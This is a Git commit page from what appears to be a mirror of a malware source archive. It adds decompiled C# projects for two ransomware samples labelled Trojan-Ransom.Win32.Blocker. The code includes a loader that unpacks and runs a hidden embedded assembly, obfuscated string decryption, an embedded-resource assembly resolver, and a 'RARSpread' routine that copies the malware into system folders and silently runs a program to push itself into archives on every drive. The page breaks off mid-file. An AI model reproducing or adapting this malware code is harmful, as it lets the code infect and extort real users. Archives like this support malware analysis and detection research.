daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-17 08:19:23 +00:00
Code Issues Projects Releases Wiki Activity

auto-decompiled msil via petikvx

Browse Source 
add
This commit is contained in:
vxunderground
2022-08-18 06:28:56 -05:00
parent 26192f771b
commit f2ac1ece55
12767 changed files with 1945075 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.fsys-0d1d8a1ea65270af9d69edd7740846364979853b991cf7a4c0ffc83b4fd60036/AssemblyInfo.cs
+15
View File
@@ -0,0 +1,15 @@
using System.Reflection;
using System.Security.Permissions;
[assembly: AssemblyDelaySign(false)]
[assembly: AssemblyCopyright("")]
[assembly: AssemblyTitle("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyKeyFile("")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyKeyName("")]
[assembly: AssemblyProduct("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyVersion("1.0.2132.1881")]
[assembly: PermissionSet(SecurityAction.RequestMinimum, XML = "<PermissionSet class=\"System.Security.PermissionSet\"\r\n version=\"1\">\r\n <IPermission class=\"System.Security.Permissions.SecurityPermission, mscorlib, Version=1.0.5000.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\"\r\n version=\"1\"\r\n Flags=\"SkipVerification\"/>\r\n</PermissionSet>\r\n")]
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.fsys-0d1d8a1ea65270af9d69edd7740846364979853b991cf7a4c0ffc83b4fd60036/Trojan-Ransom.Win32.Blocker.fsys.csproj
+42
View File
@@ -0,0 +1,42 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Blocker.fsys-0d1d8a1ea65270af9d69edd7740846364979853b991cf7a4c0ffc83b4fd60036.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{4FAE9F28-F9B9-47A0-A6C4-52EA4FC18948}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>nsnet</AssemblyName>
<ApplicationVersion>1.0.2132.1881</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualC" />
</ItemGroup>
<ItemGroup>
<Compile Include="_003CModule_003E.cs" />
<Compile Include="_CRangeDecoder.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.fsys-0d1d8a1ea65270af9d69edd7740846364979853b991cf7a4c0ffc83b4fd60036/Trojan-Ransom.Win32.Blocker.fsys.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "nsnet", "Trojan-Ransom.Win32.Blocker.fsys-0d1d8a1ea65270af9d69edd7740846364979853b991cf7a4c0ffc83b4fd60036.csproj", "{4FAE9F28-F9B9-47A0-A6C4-52EA4FC18948}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{4FAE9F28-F9B9-47A0-A6C4-52EA4FC18948}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{4FAE9F28-F9B9-47A0-A6C4-52EA4FC18948}.Debug|Any CPU.Build.0 = Debug|Any CPU
{4FAE9F28-F9B9-47A0-A6C4-52EA4FC18948}.Release|Any CPU.ActiveCfg = Release|Any CPU
{4FAE9F28-F9B9-47A0-A6C4-52EA4FC18948}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.fsys-0d1d8a1ea65270af9d69edd7740846364979853b991cf7a4c0ffc83b4fd60036/_003CModule_003E.cs
+118
View File
@@ -0,0 +1,118 @@
// Decompiled with JetBrains decompiler
// Type: <Module>
// Assembly: nsnet, Version=1.0.2132.1881, Culture=neutral, PublicKeyToken=null
// MVID: E55443D8-38A6-48C9-BD12-6F2C033A02DB
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Blocker.fsys-0d1d8a1ea65270af9d69edd7740846364979853b991cf7a4c0ffc83b4fd60036.exe
using System;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Security;
internal class \u003CModule\u003E
{
public static __FnPtr<int (uint, uint, uint)> LzmaVirtualFree;
public static __FnPtr<uint (uint, uint, uint, uint)> LzmaVirtualAlloc;
public static unsafe int main()
{
byte[] rawAssembly = new byte[(int) \u003CModule\u003E.GetoriginalSize()];
rawAssembly.Initialize();
fixed (byte* numPtr = &rawAssembly[0])
{
if (\u003CModule\u003E.GetoriginalData(numPtr) != 0)
{
Assembly assembly = Assembly.Load(rawAssembly);
int count1 = assembly.EntryPoint.GetParameters().Count;
object[] parameters = new object[count1];
if (count1 != 0)
{
string[] commandLineArgs = Environment.GetCommandLineArgs();
int count2 = Environment.GetCommandLineArgs().Count;
string[] strArray = new string[count2 - 1];
int index = 1;
if (1 < count2)
{
do
{
strArray[index - 1] = commandLineArgs[index];
++index;
}
while (index < count2);
}
parameters[0] = (object) strArray;
}
// ISSUE: explicit non-virtual call
__nonvirtual (assembly.EntryPoint.Invoke((object) null, parameters));
}
return 0;
}
}
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe void RangeDecoderInit([In] _CRangeDecoder* obj0, [In] byte* obj1, [In] uint obj2);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe uint RangeDecoderDecodeDirectBits([In] _CRangeDecoder* obj0, [In] int obj1);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int RangeDecoderBitDecode([In] ushort* obj0, [In] _CRangeDecoder* obj1);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int RangeDecoderBitTreeDecode(
[In] ushort* obj0,
[In] int obj1,
[In] _CRangeDecoder* obj2);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int RangeDecoderReverseBitTreeDecode(
[In] ushort* obj0,
[In] int obj1,
[In] _CRangeDecoder* obj2);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe byte LzmaLiteralDecodeMatch(
[In] ushort* obj0,
[In] _CRangeDecoder* obj1,
[In] byte obj2);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int LzmaLenDecode([In] ushort* obj0, [In] _CRangeDecoder* obj1, [In] int obj2);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int LzmaDecode(
[In] byte* obj0,
[In] uint obj1,
[In] int obj2,
[In] int obj3,
[In] int obj4,
[In] byte* obj5,
[In] uint obj6,
[In] byte* obj7,
[In] uint obj8);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int LzmaBlockUnPack(
[In] byte* obj0,
[In] byte* obj1,
[In] __FnPtr<uint (uint, uint, uint, uint)> obj2,
[In] __FnPtr<int (uint, uint, uint)> obj3);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern uint GetoriginalSize();
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int GetoriginalData([In] byte* obj0);
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.fsys-0d1d8a1ea65270af9d69edd7740846364979853b991cf7a4c0ffc83b4fd60036/_CRangeDecoder.cs
+17
View File
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: _CRangeDecoder
// Assembly: nsnet, Version=1.0.2132.1881, Culture=neutral, PublicKeyToken=null
// MVID: E55443D8-38A6-48C9-BD12-6F2C033A02DB
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Blocker.fsys-0d1d8a1ea65270af9d69edd7740846364979853b991cf7a4c0ffc83b4fd60036.exe
using Microsoft.VisualC;
using System;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[CLSCompliant(false)]
[MiscellaneousBits(65)]
[StructLayout(LayoutKind.Sequential, Size = 20, Pack = 1)]
public struct _CRangeDecoder
{
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/AssemblyInfo.cs
+7
View File
@@ -0,0 +1,7 @@
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Security.Permissions;
[assembly: SuppressIldasm]
[assembly: AssemblyVersion("0.0.0.0")]
[assembly: SecurityPermission(SecurityAction.RequestMinimum, SkipVerification = true)]
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/Sharl
BIN
View File
Binary file not shown.
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/Stub/Token2000022.cs
+12
View File
@@ -0,0 +1,12 @@
// Decompiled with JetBrains decompiler
// Type: Stub.Token2000022
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
namespace Stub
{
internal class Token2000022 : \u0024Unresolved\u0024Token\u003A1003FFF
{
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/Stub/cRARSpread.cs
+91
View File
@@ -0,0 +1,91 @@
// Decompiled with JetBrains decompiler
// Type: Stub.cRARSpread
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using A;
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
using System.Text;
namespace Stub
{
public class cRARSpread
{
private static string ce9ee9bdc267a842d3ef926289d8e02c2;
[DllImport("kernel32.dll", EntryPoint = "GetShortPathName", CharSet = CharSet.Auto)]
private static extern int cf4947a2d3263e417979f2a8d6a63fe5f(
[MarshalAs(UnmanagedType.LPTStr)] string c31bc76e1a9d760d9aeac01c0ca5d54d3,
[MarshalAs(UnmanagedType.LPTStr)] StringBuilder cc505c0b6198cb488994f0dda564f1c32,
int c06afa0370bf8e9e19b50aef2a782433f);
private static void cf93e0385f1c9b9b9fc9168df531885a0(string c23d3141ec47285c032d83ba6aa914036)
{
try
{
foreach (string file in Directory.GetFiles(c23d3141ec47285c032d83ba6aa914036))
{
if (file.Contains(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(322)))
cRARSpread.cc62e4c9f9f6eaec701227263483768c8(file);
if (file.Contains(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(331)))
cRARSpread.cc62e4c9f9f6eaec701227263483768c8(file);
}
foreach (string directory in Directory.GetDirectories(c23d3141ec47285c032d83ba6aa914036))
cRARSpread.cf93e0385f1c9b9b9fc9168df531885a0(directory);
}
catch
{
}
}
public static void RARSpread()
{
try
{
cRARSpread.ce9ee9bdc267a842d3ef926289d8e02c2 = Process.GetCurrentProcess().MainModule.FileName;
foreach (string logicalDrive in Environment.GetLogicalDrives())
cRARSpread.cf93e0385f1c9b9b9fc9168df531885a0(logicalDrive);
}
catch
{
}
}
private static void cc62e4c9f9f6eaec701227263483768c8(string c591e77c72aaa11ae89d3e0a04677b964)
{
try
{
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.System);
string path1 = folderPath.Replace(folderPath.Substring(folderPath.IndexOf(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(340))), string.Empty) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(340);
string path = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(343);
if (!File.Exists(path))
return;
if (!File.Exists(Path.Combine(path1, cRARSpread.ce9ee9bdc267a842d3ef926289d8e02c2)))
File.Copy(Process.GetCurrentProcess().MainModule.FileName, Path.Combine(path1, cRARSpread.ce9ee9bdc267a842d3ef926289d8e02c2));
StringBuilder cc505c0b6198cb488994f0dda564f1c32_1 = new StringBuilder((int) byte.MaxValue);
cRARSpread.cf4947a2d3263e417979f2a8d6a63fe5f(Path.Combine(path1, cRARSpread.ce9ee9bdc267a842d3ef926289d8e02c2), cc505c0b6198cb488994f0dda564f1c32_1, cc505c0b6198cb488994f0dda564f1c32_1.Capacity);
StringBuilder cc505c0b6198cb488994f0dda564f1c32_2 = new StringBuilder((int) byte.MaxValue);
cRARSpread.cf4947a2d3263e417979f2a8d6a63fe5f(c591e77c72aaa11ae89d3e0a04677b964, cc505c0b6198cb488994f0dda564f1c32_2, cc505c0b6198cb488994f0dda564f1c32_2.Capacity);
try
{
ProcessStartInfo startInfo = new ProcessStartInfo();
string str = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(380) + cc505c0b6198cb488994f0dda564f1c32_2.ToString() + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(387) + cc505c0b6198cb488994f0dda564f1c32_1.ToString();
startInfo.FileName = path;
startInfo.Arguments = str;
startInfo.WindowStyle = ProcessWindowStyle.Hidden;
Process.Start(startInfo);
}
catch
{
}
}
catch
{
}
}
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/Token2000021.cs
+12
View File
@@ -0,0 +1,12 @@
// Decompiled with JetBrains decompiler
// Type: A.Token2000021
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
namespace A
{
internal class Token2000021 : \u0024Unresolved\u0024Token\u003A1003FFF
{
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/Trojan-Ransom.Win32.Blocker.hejd.csproj
+64
View File
@@ -0,0 +1,64 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{64176F0A-1972-439B-930A-31A081E500B5}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Sharl</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
<RootNamespace>A</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Management" />
</ItemGroup>
<ItemGroup>
<Compile Include="_003CModule_003E.cs" />
<Compile Include="cb7b65dbb5581eaee2bd1292ca8df7359.cs" />
<Compile Include="c986963ced362383f6d7b6341e31dcfe7.cs" />
<Compile Include="c1f9af90f19d5acdd4845049bcd9444a8.cs" />
<Compile Include="c6c454dac7269c067c2acbc6d3596af91.cs" />
<Compile Include="c25810691943c3772c89bee5b3c190ee0.cs" />
<Compile Include="c57ac7140997a29abffbea04a04f33fc6.cs" />
<Compile Include="ca2a3d5a1b8d431c404c11a5f27d5064a.cs" />
<Compile Include="c723bfb08ed492f620d3f103aea9340c0.cs" />
<Compile Include="cee7cc3756d4f6d8913411c92b2e1cc36.cs" />
<Compile Include="c2b32128b27710d76674c1117f7f19ccf.cs" />
<Compile Include="c6483995e04301d945fdc8bbbeb2fdfcb.cs" />
<Compile Include="c9988649815b3bee89b89ce1f70add59a.cs" />
<Compile Include="c3037471a929a2c4f79d69973718345fa.cs" />
<Compile Include="cb7379333abfa1ab1cb35304f3a8573ec.cs" />
<Compile Include="c9b81b1a3e4ee51d08f5de2448e459036.cs" />
<Compile Include="c3f3e07dcb3874c5b417537b713b608b7.cs" />
<Compile Include="c7bada025401008fe87db7163fb8faf48.cs" />
<Compile Include="Token2000021.cs" />
<Compile Include="Stub\cRARSpread.cs" />
<Compile Include="Stub\Token2000022.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Sharl" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/Trojan-Ransom.Win32.Blocker.hejd.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Sharl", "Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.csproj", "{64176F0A-1972-439B-930A-31A081E500B5}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{64176F0A-1972-439B-930A-31A081E500B5}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{64176F0A-1972-439B-930A-31A081E500B5}.Debug|Any CPU.Build.0 = Debug|Any CPU
{64176F0A-1972-439B-930A-31A081E500B5}.Release|Any CPU.ActiveCfg = Release|Any CPU
{64176F0A-1972-439B-930A-31A081E500B5}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/_003CModule_003E.cs
+12
View File
@@ -0,0 +1,12 @@
// Decompiled with JetBrains decompiler
// Type: <Module>
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using A;
internal class \u003CModule\u003E
{
static \u003CModule\u003E() => cb7b65dbb5581eaee2bd1292ca8df7359.ced5cd5d8a5c50a5a5aa8329c9369c6b7();
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/c1f9af90f19d5acdd4845049bcd9444a8.cs
+125
View File
@@ -0,0 +1,125 @@
// Decompiled with JetBrains decompiler
// Type: A.c1f9af90f19d5acdd4845049bcd9444a8
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using System;
using System.Collections;
using System.IO;
using System.Reflection;
namespace A
{
internal class c1f9af90f19d5acdd4845049bcd9444a8
{
private static readonly Hashtable c7e4f9fe198eee3a882008833d9159fcd = new Hashtable();
private static readonly Hashtable c117122acd19861812518cbadde59037e = new Hashtable();
internal static void cfe055d7d0b39490089d150a4a9443779()
{
char[] charArray = "".ToCharArray();
for (int index = 0; index < charArray.Length; ++index)
charArray[index] = (char) ~(ushort) charArray[index];
string[] strArray = new string(charArray).Split(new string[1]
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2509)
}, StringSplitOptions.RemoveEmptyEntries);
if (strArray != null && strArray.Length >= 0)
{
for (int index = 0; index < strArray.Length; index += 2)
{
if (strArray[index + 1].StartsWith(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2514)))
{
try
{
Assembly executingAssembly = Assembly.GetExecutingAssembly();
string path = Path.Combine(Path.GetDirectoryName(executingAssembly.Location), strArray[index]);
if (!File.Exists(path))
{
foreach (string manifestResourceName in executingAssembly.GetManifestResourceNames())
{
if (manifestResourceName == strArray[index + 1])
{
Stream manifestResourceStream = executingAssembly.GetManifestResourceStream(manifestResourceName);
byte[] buffer = c723bfb08ed492f620d3f103aea9340c0.c62aa9377688ed67bcfc8a790818c7647(manifestResourceStream);
using (FileStream fileStream = new FileStream(path, FileMode.Create, FileAccess.Write))
fileStream.Write(buffer, 0, buffer.Length);
manifestResourceStream.Close();
}
}
}
}
catch
{
}
}
else
c1f9af90f19d5acdd4845049bcd9444a8.c117122acd19861812518cbadde59037e[(object) strArray[index]] = (object) strArray[index + 1];
}
}
AppDomain.CurrentDomain.AssemblyResolve += new ResolveEventHandler(c1f9af90f19d5acdd4845049bcd9444a8.c990de96805170250d1fdfc1d6c753706);
}
private static Assembly c990de96805170250d1fdfc1d6c753706(
object c5669828436342a69e25de42ecd6cb771,
ResolveEventArgs c01306e5de7acf5afd10f9b0df1fe65dd)
{
string name = c01306e5de7acf5afd10f9b0df1fe65dd.Name;
string empty = string.Empty;
foreach (string key in (IEnumerable) c1f9af90f19d5acdd4845049bcd9444a8.c117122acd19861812518cbadde59037e.Keys)
{
if (key.StartsWith(name))
{
Assembly assembly = c1f9af90f19d5acdd4845049bcd9444a8.c7e4f9fe198eee3a882008833d9159fcd[(object) key] as Assembly;
if ((object) assembly != null)
return assembly;
empty = c1f9af90f19d5acdd4845049bcd9444a8.c117122acd19861812518cbadde59037e[(object) key] as string;
break;
}
}
if (empty.Length == 0)
return (Assembly) null;
Assembly executingAssembly = Assembly.GetExecutingAssembly();
foreach (string manifestResourceName1 in executingAssembly.GetManifestResourceNames())
{
if (manifestResourceName1 == empty)
{
byte[] rawAssembly = c723bfb08ed492f620d3f103aea9340c0.c62aa9377688ed67bcfc8a790818c7647(executingAssembly.GetManifestResourceStream(manifestResourceName1));
byte[] rawSymbolStore = (byte[]) null;
try
{
string str = empty + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2517);
foreach (string manifestResourceName2 in executingAssembly.GetManifestResourceNames())
{
if (manifestResourceName2 == str)
rawSymbolStore = c723bfb08ed492f620d3f103aea9340c0.c62aa9377688ed67bcfc8a790818c7647(executingAssembly.GetManifestResourceStream(manifestResourceName2));
}
}
catch (Exception ex)
{
}
Assembly assembly;
if (rawSymbolStore == null)
{
assembly = Assembly.Load(rawAssembly);
}
else
{
try
{
assembly = Assembly.Load(rawAssembly, rawSymbolStore);
}
catch (Exception ex)
{
assembly = Assembly.Load(rawAssembly);
}
}
c1f9af90f19d5acdd4845049bcd9444a8.c7e4f9fe198eee3a882008833d9159fcd[(object) name] = (object) assembly;
return assembly;
}
}
return (Assembly) null;
}
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/c25810691943c3772c89bee5b3c190ee0.cs
+45
View File
@@ -0,0 +1,45 @@
// Decompiled with JetBrains decompiler
// Type: A.c25810691943c3772c89bee5b3c190ee0
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using System.Reflection;
using System.Text;
namespace A
{
internal class c25810691943c3772c89bee5b3c190ee0
{
internal static readonly byte[] c5e9a3dbd2a1aab07443c36ff76e6fcef;
static c25810691943c3772c89bee5b3c190ee0()
{
if (c25810691943c3772c89bee5b3c190ee0.c5e9a3dbd2a1aab07443c36ff76e6fcef != null)
return;
Assembly executingAssembly = Assembly.GetExecutingAssembly();
c25810691943c3772c89bee5b3c190ee0.c5e9a3dbd2a1aab07443c36ff76e6fcef = c723bfb08ed492f620d3f103aea9340c0.c62aa9377688ed67bcfc8a790818c7647(executingAssembly.GetManifestResourceStream(executingAssembly.GetName().Name + executingAssembly.GetName().Name));
}
internal static string c67f77785e5df280621394f94fff2ffdf(int cb118298f356e23d856766cd5c0861a45)
{
int count;
if (((int) c25810691943c3772c89bee5b3c190ee0.c5e9a3dbd2a1aab07443c36ff76e6fcef[cb118298f356e23d856766cd5c0861a45] & 128) == 0)
{
count = (int) c25810691943c3772c89bee5b3c190ee0.c5e9a3dbd2a1aab07443c36ff76e6fcef[cb118298f356e23d856766cd5c0861a45];
++cb118298f356e23d856766cd5c0861a45;
}
else if (((int) c25810691943c3772c89bee5b3c190ee0.c5e9a3dbd2a1aab07443c36ff76e6fcef[cb118298f356e23d856766cd5c0861a45] & 64) == 0)
{
